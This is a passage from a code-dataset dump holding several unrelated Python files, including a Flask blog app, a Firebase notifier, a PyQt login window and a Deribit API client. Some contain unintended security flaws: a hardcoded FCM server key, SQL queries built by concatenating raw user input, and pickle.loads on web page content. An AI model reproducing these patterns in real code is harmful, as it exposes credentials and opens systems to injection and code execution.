pos['lat'], color='grey', lw=0.5)\n\n\ndef plotBuildings(path):\n print(\"Plotting buildings\")\n with open(path, 'r') as csv_file:\n csv.Dialect.delimiter = ' '\n reader = csv.reader(csv_file, delimiter=' ')\n next(reader) # skip first row\n for row in reader:\n cords_x = []\n cords_y = []\n if(row[0] == 'office'):\n for i in range(4, 2*(int(row[3]) + 1), 2):\n cords_x.append(float(row[i]))\n cords_y.append(float(row[i+1]))\n cords_x.append(cords_x[0])\n cords_y.append(cords_y[0])\n plt.plot(cords_x, cords_y, color='r')\n if(row[0] == 'home'):\n for i in range(4, 2*(int(row[3]) + 1), 2):\n cords_x.append(float(row[i]))\n cords_y.append(float(row[i+1]))\n cords_x.append(cords_x[0])\n cords_y.append(cords_y[0])\n plt.plot(cords_x, cords_y, color='g')\n\ndef createJar():\n try:\n proc = subprocess.Popen('mvn ' + ' clean package')\n except:\n proc = subprocess.Popen(MVN_PATH + ' clean package')\n finally:\n proc.wait()\n\n\ndef createCache(call):\n proc = subprocess.Popen(call)\n proc.wait()\n\n\ndef bulkSave():\n MIN_BUILDING_SIZE = 150\n MAX_BUILDING_SIZE = 999999\n createJar()\n\n for city in maps:\n plt.figure(figsize=(12.5, 8.5), dpi=300)\n call = \"java -Xmx12g -Xss1g -jar target/bonnmotion.jar OSMBuildingStats --in cities_10000/{}_cut_bbox.osm.pbf --out data/OSMBuildingStats/{} --min {} --max {}\".format(\n city, city, MIN_BUILDING_SIZE, MAX_BUILDING_SIZE)\n createCache(call)\n\n plotRoad('data/OSMBuildingStats/{}.street_network.dat'.format(city))\n plotBuildings('data/OSMBuildingStats/{}.csv'.format(city))\n plt.title(city)\n plt.savefig('data/OSMBuildingStats/{}_map.png'.format(city))\n plt.clf()\n\n\nif __name__ == \"__main__\":\n\n # Process all map\n # bulkSave()\n\n path_building = sys.argv[1]\n path_road = sys.argv[2]\n\n # path_building = 'data/BuildingCache/out.csv'\n # path_road = \"data/BuildingCache/out.street_network.dat\"\n\n plotRoad(path_road)\n plotBuildings(path_building)\n mng = plt.get_current_fig_manager()\n mng.frame.Maximize(True)\n plt.show()\n\n# mplleaflet.show(tiles=(\n# 'http://{s}.tile.openstreetmap.de/{z}/{x}/{y}.png',\n# 'Map data (c)
    OpenStreetMap contributors'\n# ))\n", "sub_path": "scripts/building_cache_polt.py", "file_name": "building_cache_polt.py", "file_ext": "py", "file_size_in_byte": 3396, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "csv.Dialect", "line_number": 40, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 63, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 65, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 98, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 99, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.get_current_fig_manager", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}]} +{"seq_id": "227062489", "text": "import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nimport datetime\nimport json\nimport requests\n\nserver_key = 'AAAAsikYyb0:APA91bGwXYmYutp5dyUI74YNndwBgEFWfCmB4RxJdiPSHqxZ8Xa6fy_4MXKbPbTcbXoIdNMB5G0-CWXlT_fTzUUMPYcPIJ-TL7_UzPhFYSQW8pjJpUZIbvGuqxYKwiFQfq8jKFeUmTyi'\nserial = '123'\ndevice_token = ''\n\ndef send_notification(msg) :\n\theaders = {\n\t\t'Authorization': 'key= ' + server_key,\n\t\t'Content-Type': 'application/json',\n\t}\n\n\tdata = {\n\t\t'to': device_token,\n\t\t'notification': {\n\t\t\t'title': 'Inner car',\n\t\t\t'body': msg\n\t\t},\n\t}\n\n\tresponse = requests.post('https://fcm.googleapis.com/fcm/send', headers=headers, data=json.dumps(data))\n\tprint(response)\n\tprint(\"\")\n\tprint(\"\")\n\tprint(\"exit\")\n\nif __name__ == '__main__':\n\tcred = credentials.Certificate('capstone-liunx0-firebase-adminsdk-8ke8r-eca629c61b.json')\n\n\tfirebase_admin.initialize_app(cred, {\n\t\t'databaseURL': 'https://capstone-liunx0.firebaseio.com/'\n\t\t})\n\n\tref = db.reference(serial + '/Device')\n\tdevice_token = ref.get()\n\n\tprint(\"\")\n\tprint(\"\")\n\tprint(device_token)\n\tprint(\"\")\n\tprint(\"\")\n\n\tif(device_token != None) :\n\t\tsend_notification('baby')\n\n", "sub_path": "Python/FMNG.py", "file_name": "FMNG.py", "file_ext": "py", "file_size_in_byte": 1137, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.post", "line_number": 26, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "firebase_admin.credentials.Certificate", "line_number": 33, "usage_type": "call"}, {"api_name": "firebase_admin.credentials", "line_number": 33, "usage_type": "name"}, {"api_name": "firebase_admin.initialize_app", "line_number": 35, "usage_type": "call"}, {"api_name": "firebase_admin.db.reference", "line_number": 39, "usage_type": "call"}, {"api_name": "firebase_admin.db", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "633152036", "text": "import csv\nimport datetime\n\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom squirrel.models import Chipmunk\n\ndef str_to_bool(x):\n if x.lower() == 'true':\n return True\n elif x.lower() == 'false':\n return False\n else:\n # evil ValueError that doesn't tell you what the wrong value was\n raise ValueError(\"Has to be True or False!\")\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument('path')\n\n def handle(self, *args, **kwargs):\n path = kwargs['path']\n\n try:\n with open(path, encoding='utf-8') as fp:\n reader = csv.DictReader(fp)\n\n\n for item in reader:\n squirrel = Chipmunk.objects.filter(\n unique_squirrel_id=item['Unique Squirrel ID'])\n if squirrel.exists():\n continue\n squirrel=Chipmunk(\n longitude=item['X'],\n latitude=item['Y'],\n unique_squirrel_id=item['Unique Squirrel ID'],\n shift=item['Shift'],\n date=datetime.date(int(item['Date'][-4:]),int(item['Date'][:2]),int(item['Date'][2:4])), \n age=item['Age'],\n primary_fur_color=item['Primary Fur Color'],\n location=item['Location'],\n specific_location=item['Specific Location'],\n running=str_to_bool(item['Running']),\n chasing=str_to_bool(item['Chasing']),\n climbing=str_to_bool(item['Climbing']),\n eating=str_to_bool(item['Eating']),\n foraging=str_to_bool(item['Foraging']),\n other_activities=item['Other Activities'],\n kuks=str_to_bool(item['Kuks']),\n quaas=str_to_bool(item['Quaas']),\n moans=str_to_bool(item['Moans']),\n tail_flags=str_to_bool(item['Tail flags']),\n tail_twitches=str_to_bool(item['Tail twitches']),\n approaches=str_to_bool(item['Approaches']),\n indifferent=str_to_bool(item['Indifferent']),\n runs_from=str_to_bool(item['Runs from']),\n )\n\n squirrel.save()\n #print(f\"Squirrel {item['Unique Squirrel ID']} imported successfully!\")\n except csv.Error as e:\n print(f'there is something wrong with {reader.line_num}')\n", "sub_path": "squirrel/management/commands/import_data.py", "file_name": "import_data.py", "file_ext": "py", "file_size_in_byte": 2652, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.core.management.base.BaseCommand", "line_number": 17, "usage_type": "name"}, {"api_name": "csv.DictReader", "line_number": 26, "usage_type": "call"}, {"api_name": "squirrel.models", "line_number": 30, "usage_type": "name"}, {"api_name": "squirrel.models.Chipmunk.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "squirrel.models.Chipmunk.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "squirrel.models.Chipmunk", "line_number": 30, "usage_type": "name"}, {"api_name": "squirrel.models.exists", "line_number": 32, "usage_type": "call"}, {"api_name": "squirrel.models", "line_number": 32, "usage_type": "name"}, {"api_name": "squirrel.models", "line_number": 34, "usage_type": "name"}, {"api_name": "squirrel.models.Chipmunk", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 39, "usage_type": "call"}, {"api_name": "squirrel.models.save", "line_number": 60, "usage_type": "call"}, {"api_name": "squirrel.models", "line_number": 60, "usage_type": "name"}, {"api_name": "csv.Error", "line_number": 62, "usage_type": "attribute"}]} +{"seq_id": "120122565", "text": "from PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow, QLabel, QGridLayout, QWidget, QApplication, QPushButton, QDialog\nfrom PyQt5.QtCore import QSize, pyqtSlot, QUrl\nfrom PyQt5.QtWebEngineWidgets import QWebEnginePage\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\nimport binascii\nimport codecs\nimport pickle\nimport httplib2\nimport fitAPI\n\nclass authWindow(QWebEngineView):\n def __init__(self, parentWindow, portNumber):\n super().__init__()\n self.title = 'Login'\n self.left = 50\n self.top = 50\n self.width = 500\n self.height = 800\n self.portNumber = portNumber\n self.initUI()\n self.parentWindow = parentWindow\n \n def initUI(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.load(QUrl(\"http://localhost:\" + str(self.portNumber) + \"/?fake_user=Rowdy123456\"))\n self.show()\n\n self.loadFinished.connect(self.decodeCredentials)\n\n @pyqtSlot()\n def decodeCredentials(self):\n self.page().toPlainText(self.printBase64PickledCredentials)\n\n def printBase64PickledCredentials(self, result):\n try:\n encodedString = result.encode()\n pickledString = codecs.decode(encodedString, \"base64\")\n self.parentWindow.credentials = pickle.loads(pickledString)\n self.close()\n except (EOFError, pickle.UnpicklingError, binascii.Error):\n pass\n\n\ndef authenticate(parentWindow, portNumber):\n d = authWindow(parentWindow, portNumber)\n return d\n\n\n", "sub_path": "GoogleFitExporter/authWindow.py", "file_name": "authWindow.py", "file_ext": "py", "file_size_in_byte": 1595, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "PyQt5.QtWebEngineWidgets.QWebEngineView", "line_number": 12, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QUrl", "line_number": 27, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 32, "usage_type": "call"}, {"api_name": "codecs.decode", "line_number": 39, "usage_type": "call"}, {"api_name": "pickle.loads", "line_number": 40, "usage_type": "call"}, {"api_name": "pickle.UnpicklingError", "line_number": 42, "usage_type": "attribute"}, {"api_name": "binascii.Error", "line_number": 42, "usage_type": "attribute"}]} +{"seq_id": "435845294", "text": "from flask import Flask, render_template, request, jsonify, url_for, redirect\nfrom collections import defaultdict\nimport datetime\nimport pymysql\nfrom utils.t import timeTransform\n\ndb = pymysql.connect(host=\"localhost\",user=\"root\",passwd=\"root\",db=\"ZCMOL\",charset=\"utf8\")\ncursor = db.cursor()\n\napp = Flask(__name__)\n#主页\n@app.route('/')\n@app.route('/index')\ndef index():\n record_ip()\n sql_get_guestbook = \"select * from zc_guestbook order by gu_id desc limit 50\"\n cursor.execute(sql_get_guestbook) \n guestbook = cursor.fetchall()\n \n sql_get_links = \"select * from zc_links order by rand()\"\n cursor.execute(sql_get_links)\n links = cursor.fetchall()\n\n sql_get_play = \"select * from zc_anime\"\n cursor.execute(sql_get_play)\n play = cursor.fetchall()\n\n # 随机抽取一条数据\n #sql_get_music = \"select * from zc_music order by rand() limit 1\"\n sql_get_music = \"select * from zc_music where mu_id = 2\"\n cursor.execute(sql_get_music)\n bg_music = cursor.fetchone()\n \n sql_get_log = \"select * from zc_article order by ar_id desc limit 13\"\n cursor.execute(sql_get_log)\n log = cursor.fetchall()\n \n data = {\"guestbook\":guestbook,\"links\":links,\"play\":play,\"bg_music\":bg_music,\"log\":log}\n return render_template(\"index.html\", **data,timeFormat=timeTransform)\n\n#文章评论\n@app.route('/daily/')\ndef daily(article_id):\n\n #获取上下两篇\n\n sql_get_next = \"select ar_id from zc_article where ar_id > \"+str(article_id)+\" limit 1\"\n cursor.execute(sql_get_next)\n next_id = cursor.fetchone()\n sql_get_prev= \"select ar_id from zc_article where ar_id < \"+str(article_id)+\" order by ar_id desc limit 1\"\n cursor.execute(sql_get_prev)\n prev_id = cursor.fetchone()\n\n if next_id is not None:\n next_id = next_id[0]\n else:\n next_id = \"none\"\n if prev_id is not None:\n prev_id = prev_id[0]\n else:\n prev_id = \"none\"\n\n sql_get_content = \"select * from zc_article where ar_id = \"+str(article_id)\n cursor.execute(sql_get_content)\n content = cursor.fetchone()\n if content is None:\n return (\"文章已经删除了,哈哈\")\n \n comment_sql = \"select * from zc_comment where ar_id =\"+str(article_id)\n cursor.execute(comment_sql)\n comment = cursor.fetchall()\n \n # sort\n comment_dict = defaultdict(list)\n name_dict = dict()\n for c in comment:\n comment_dict[str(c[6])].append(c)\n name_dict[str(c[0])] = c[1]\n\n# print(comment_dict)\n\n# for root in comment_dict['None']:\n# print(root)\n# if str(root[0]) in comment_dict:\n# show(root[0])\n\n# def show(l):\n# for item in l:\n# print(item)\n# if str(item[0]) in comment_dict:\n# show(comment_dict[str(item[0])\n \n\n data = {\"content\":content,\"comment\":comment_dict,\"next_id\":next_id,\"prev_id\":prev_id, \"names\": name_dict}\n return render_template(\"daily.html\",**data)\n\n\n@app.route('/daily/comment',methods=['POST'])\ndef daily_comment():\n nickname = request.form[\"comment-nickname\"]\n if nickname == \"早茶月光\":\n return \"不能使用这个名字哟\"\n say = request.form[\"comment-say\"] \n article_id = request.form[\"article-reply-id\"]\n ip = request.headers['X-Forwarded-For']\n t = datetime.datetime.now()\n \n #判断时间\n check_time_sql = \"select * from zc_comment where co_ip='\"+ip+\"' and timestampdiff(SECOND,co_time,'\"+str(t)+\"') < 20\"\n check_time = cursor.execute(check_time_sql) \n if check_time > 0:\n return \"两次留言时间间隔要大于20秒\"\n\n has_reply = True\n reply_id = 1\n if 'reply-id' in request.form and request.form['reply-id']:\n reply_id = request.form['reply-id'] \n else:\n has_reply = False\n sql_comment = \"\"\n if has_reply:\n sql_comment = \"insert into zc_comment(co_name,co_content,co_time,co_ip,ar_id,co_replay_id) values('\"+nickname+\"','\"+say+\"','\"+str(t)+\"','\"+ip+\"','\"+article_id+\"','\"+reply_id+\"')\"\n else:\n sql_comment = \"insert into zc_comment(co_name,co_content,co_time,co_ip,ar_id) values('\"+nickname+\"','\"+say+\"','\"+str(t)+\"','\"+ip+\"','\"+article_id+\"')\"\n #print(nickname,say,article_id,ip,t,reply_id)\n #print(sql_comment)\n cursor.execute(sql_comment)\n db.commit() \n return redirect(url_for(\"daily\", article_id=article_id))\n\n\n \n\n \n\n\n\n#获取留言 \n@app.route('/guestbook',methods=['POST'])\ndef guestbook():\n nickname = request.form[\"nickname\"]\n say = request.form[\"say\"]\n if len(nickname.strip())== 0 or len(say.strip())==0 :\n return \"nickname or say is null\"\n ip = request.headers['X-Forwarded-For']\n time = datetime.datetime.now() \n \n #say time\n check_input_time_sql = \"select * from zc_guestbook where gu_ip ='\"+ip+\"' and timestampdiff(SECOND,gu_time,'\"+str(time)+\"')<20\"\n check_time = cursor.execute(check_input_time_sql) \n if check_time > 0:\n return \"showtip\"\n\n sql_insert = \"insert into zc_guestbook(gu_nickname,gu_say,gu_myreplay,gu_time,gu_ip) values('\"+nickname+\"','\"+say+\"','','\"+str(time)+\"','\"+ip+\"')\"\n cursor.execute(sql_insert)\n db.commit()\n\n sql_get = \"select * from zc_guestbook order by gu_id desc\"\n cursor.execute(sql_get)\n say_all = cursor.fetchall() \n \n data = {'list': say_all} \n\n return jsonify(data)\n \n\n\ndef record_ip():\n ip = request.headers['X-Forwarded-For'] \n t = datetime.datetime.now()\n sql_exist = \"select * from zc_allip where ip_ip='\"+ip+\"' limit 1\" \n exist = cursor.execute(sql_exist)\n if exist == 0:\n sql_insert = \"insert into zc_allip(ip_ip,ip_time) values('\"+ip+\"','\"+str(t)+\"')\"\n cursor.execute(sql_insert)\n sql_add = \"update zc_home set ho_liulanshu = ho_liulanshu+1 where ho_id = 1\"\n cursor.execute(sql_add) \n else:\n sql = \"select * from zc_allip where ip_ip='\"+ip+\"' and timestampdiff(SECOND,ip_time,'\"+str(t)+\"')>300\"\n is_add = cursor.execute(sql)\n if is_add > 0:\n sql_add = \"update zc_home set ho_liulanshu = ho_liulanshu+1 where ho_id = 1\"\n cursor.execute(sql_add) \n sql_update = \"update zc_allip set ip_time='\"+str(t)+\"' where ip_ip='\"+ip+\"'\" \n cursor.execute(sql_update)\n db.commit()\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n #app.run(port=5000,debug=True)\n app.run(port=5000)\n", "sub_path": "ZCMOL/zcmol/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 6400, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pymysql.connect", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 39, "usage_type": "call"}, {"api_name": "utils.t.timeTransform", "line_number": 39, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 100, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 103, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 104, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 104, "usage_type": "name"}, {"api_name": "flask.request.headers", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 105, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 106, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 106, "usage_type": "attribute"}, {"api_name": "flask.request.form", "line_number": 116, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 116, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 117, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 117, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 129, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 129, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 141, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 141, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 142, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 142, "usage_type": "name"}, {"api_name": "flask.request.headers", "line_number": 145, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 145, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 146, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 146, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 164, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 169, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 169, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 170, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 170, "usage_type": "attribute"}]} +{"seq_id": "154064509", "text": "import pandas as pd\norders = pd.read_csv('D:/order_brush_order.csv')\norders.drop('orderid', inplace=True, axis=1)\norders['hour'] = pd.to_datetime(orders['event_time'])\nimport datetime\norders = orders.sort_values(by=['shopid','hour'])\nhourref = datetime.timedelta(hours=1)\n\ncurrshop = 0\ncurrshopstart = 0\ncurrshopend = 0\ncurrd = {}\nshops = {}\n#222750\nfor row in range(222750):\n if currshop != orders.iloc[row,0]:\n currshop = orders.iloc[row,0]\n currshopstart = row\n currshopend = row\n currd = {orders.iloc[row,1] : 1}\n shops[orders.iloc[row,0]] = 0\n continue\n \n currshopend += 1\n \n cont = False\n while orders.iloc[currshopend,3] - orders.iloc[currshopstart,3] > hourref and currshopstart < currshopend:\n if currd[orders.iloc[currshopstart,1]] == 1:\n del currd[orders.iloc[currshopstart,1]]\n else:\n currd[orders.iloc[currshopstart,1]] -= 1\n currshopstart += 1\n if currshopstart == currshopend:\n currd = {orders.iloc[currshopstart,1] : 1}\n break\n \n if orders.iloc[row,1] not in currd:\n currd[orders.iloc[row,1]] = 1\n else:\n currd[orders.iloc[row,1]] += 1\n \n \n if currshopend - currshopstart + 1 >= 3 * len(currd):\n #print(orders.iloc[row,0])\n #print(currd)\n shops[orders.iloc[row,0]] = max(currd, key = currd.get)\n\nresult = [[k, v] for k,v in shops.items()]\nanswer = pd.DataFrame(result, columns =['shopid', 'userid']) \n#answer.to_csv('RetailRow.csv')\n", "sub_path": "asdf.py", "file_name": "asdf.py", "file_ext": "py", "file_size_in_byte": 1542, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 2, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 4, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 7, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "145729886", "text": "# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# coding=UTF-8\n\nimport numpy as np\nimport hnswlib\nfrom paddlenlp.utils.log import logger\n\n\ndef build_index(args, data_loader, model):\n\n index = hnswlib.Index(space='ip', dim=args.output_emb_size)\n\n # Initializing index\n # max_elements - the maximum number of elements (capacity). Will throw an exception if exceeded\n # during insertion of an element.\n # The capacity can be increased by saving/loading the index, see below.\n #\n # ef_construction - controls index search speed/build speed tradeoff\n #\n # M - is tightly connected with internal dimensionality of the data. Strongly affects memory consumption (~M)\n # Higher M leads to higher accuracy/run_time at fixed ef/efConstruction\n index.init_index(\n max_elements=args.hnsw_max_elements,\n ef_construction=args.hnsw_ef,\n M=args.hnsw_m)\n\n # Controlling the recall by setting ef:\n # higher ef leads to better accuracy, but slower search\n index.set_ef(args.hnsw_ef)\n\n # Set number of threads used during batch search/construction\n # By default using all available cores\n index.set_num_threads(16)\n\n logger.info(\"start build index..........\")\n\n all_embeddings = []\n\n for text_embeddings in model.get_semantic_embedding(data_loader):\n all_embeddings.append(text_embeddings.numpy())\n\n all_embeddings = np.concatenate(all_embeddings, axis=0)\n index.add_items(all_embeddings)\n\n logger.info(\"Total index number:{}\".format(index.get_current_count()))\n\n return index\n", "sub_path": "examples/semantic_indexing/ann_util.py", "file_name": "ann_util.py", "file_ext": "py", "file_size_in_byte": 2119, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "hnswlib.Index", "line_number": 24, "usage_type": "call"}, {"api_name": "paddlenlp.utils.log.logger.info", "line_number": 48, "usage_type": "call"}, {"api_name": "paddlenlp.utils.log.logger", "line_number": 48, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 55, "usage_type": "call"}, {"api_name": "paddlenlp.utils.log.logger.info", "line_number": 58, "usage_type": "call"}, {"api_name": "paddlenlp.utils.log.logger", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "78616363", "text": "# -*- coding: utf-8 -*-\r\n\r\nimport time, hashlib, requests, base64, sys\r\nfrom collections import OrderedDict\r\n\r\n\r\nclass RestClient(object):\r\n def __init__(self, key=None, secret=None, url=None):\r\n self.key = key\r\n self.secret = secret\r\n self.session = requests.Session()\r\n\r\n if url:\r\n self.url = url\r\n else:\r\n self.url = \"https://www.deribit.com\"\r\n\r\n if (self.url == \"https://test.deribit.com\"):\r\n self.verify = False\r\n else:\r\n self.verify = True\r\n\r\n def request(self, action, data):\r\n response = None\r\n\r\n if action.startswith(\"/api/v1/private/\"):\r\n if self.key is None or self.secret is None:\r\n raise Exception(\"Key or secret empty\")\r\n\r\n signature = self.generate_signature(action, data)\r\n response = self.session.post(self.url + action, data=data, headers={'x-deribit-sig': signature},\r\n verify=self.verify)\r\n else:\r\n response = self.session.get(self.url + action, params=data, verify=self.verify)\r\n\r\n if response.status_code != 200:\r\n raise Exception(\"Wrong response code: {0}\".format(response.status_code))\r\n\r\n json = response.json()\r\n # print(\"JSON RESULT\", json)\r\n\r\n # The result set from this method does not return a \"Success\" parameter\r\n # and this check must be skipped to avoid it failing completely\r\n if not action.startswith(\"/api/v1/private/datatable\"):\r\n if not action.startswith(\"/api/v1/private/\"):\r\n if json[\"success\"] == False:\r\n raise Exception(\"Failed: \" + json[\"message\"])\r\n\r\n\r\n if \"result\" in json:\r\n return json[\"result\"]\r\n elif \"message\" in json:\r\n return json[\"message\"]\r\n elif \"data\" in json:\r\n return json[\"data\"]\r\n else:\r\n return \"Ok\"\r\n\r\n def generate_signature(self, action, data):\r\n tstamp = int(time.time() * 1000)\r\n signature_data = {\r\n '_': tstamp,\r\n '_ackey': self.key,\r\n '_acsec': self.secret,\r\n '_action': action\r\n }\r\n signature_data.update(data)\r\n sorted_signature_data = OrderedDict(sorted(signature_data.items(), key=lambda t: t[0]))\r\n\r\n def converter(data):\r\n key = data[0]\r\n value = data[1]\r\n if isinstance(value, list):\r\n return '='.join([str(key), ''.join(value)])\r\n else:\r\n return '='.join([str(key), str(value)])\r\n\r\n items = map(converter, sorted_signature_data.items())\r\n\r\n signature_string = '&'.join(items)\r\n\r\n sha256 = hashlib.sha256()\r\n sha256.update(signature_string.encode(\"utf-8\"))\r\n sig = self.key + \".\" + str(tstamp) + \".\"\r\n sig += base64.b64encode(sha256.digest()).decode(\"utf-8\")\r\n return sig\r\n\r\n def getorderbook(self, instrument):\r\n return self.request(\"/api/v1/public/getorderbook\", {'instrument': instrument})\r\n\r\n def getinstruments(self):\r\n return self.request(\"/api/v1/public/getinstruments\", {})\r\n\r\n def getcurrencies(self):\r\n return self.request(\"/api/v1/public/getcurrencies\", {})\r\n\r\n def getlasttrades(self, instrument, count=None, since=None):\r\n options = {\r\n 'instrument': instrument\r\n }\r\n\r\n if since:\r\n options['since'] = since\r\n\r\n if count:\r\n options['count'] = count\r\n\r\n return self.request(\"/api/v1/public/getlasttrades\", options)\r\n\r\n def getsummary(self, instrument):\r\n return self.request(\"/api/v1/public/getsummary\", {\"instrument\": instrument})\r\n\r\n def index(self):\r\n return self.request(\"/api/v1/public/index\", {})\r\n\r\n def stats(self):\r\n return self.request(\"/api/v1/public/stats\", {})\r\n\r\n def account(self):\r\n return self.request(\"/api/v1/private/account\", {})\r\n\r\n def buy(self, instrument, quantity, price, postOnly=None, label=None, adv=None, tif=None):\r\n\r\n options = {\r\n \"instrument\": instrument,\r\n \"quantity\": quantity,\r\n \"price\": price\r\n }\r\n\r\n if label:\r\n options[\"label\"] = label\r\n\r\n if postOnly:\r\n options[\"postOnly\"] = postOnly\r\n\r\n if adv:\r\n options[\"adv\"] = adv\r\n\r\n if tif:\r\n options[\"time_in_force\"] = tif\r\n\r\n return self.request(\"/api/v1/private/buy\", options)\r\n\r\n def sell(self, instrument, quantity, price, postOnly=None, label=None, adv=None, tif=None):\r\n options = {\r\n \"instrument\": instrument,\r\n \"quantity\": quantity,\r\n \"price\": price\r\n }\r\n\r\n if label:\r\n options[\"label\"] = label\r\n\r\n if postOnly:\r\n options[\"postOnly\"] = postOnly\r\n\r\n if adv:\r\n options[\"adv\"] = adv\r\n\r\n if tif:\r\n options[\"time_in_force\"] = tif\r\n\r\n return self.request(\"/api/v1/private/sell\", options)\r\n\r\n def cancel(self, orderId):\r\n options = {\r\n \"orderId\": orderId\r\n }\r\n\r\n return self.request(\"/api/v1/private/cancel\", options)\r\n\r\n def cancelall(self, typeDef=\"all\"):\r\n return self.request(\"/api/v1/private/cancelall\", {\"type\": typeDef})\r\n\r\n def edit(self, orderId, quantity, price):\r\n options = {\r\n \"orderId\": orderId,\r\n \"quantity\": quantity,\r\n \"price\": price\r\n }\r\n\r\n return self.request(\"/api/v1/private/edit\", options)\r\n\r\n def getopenorders(self, instrument=None, orderId=None):\r\n 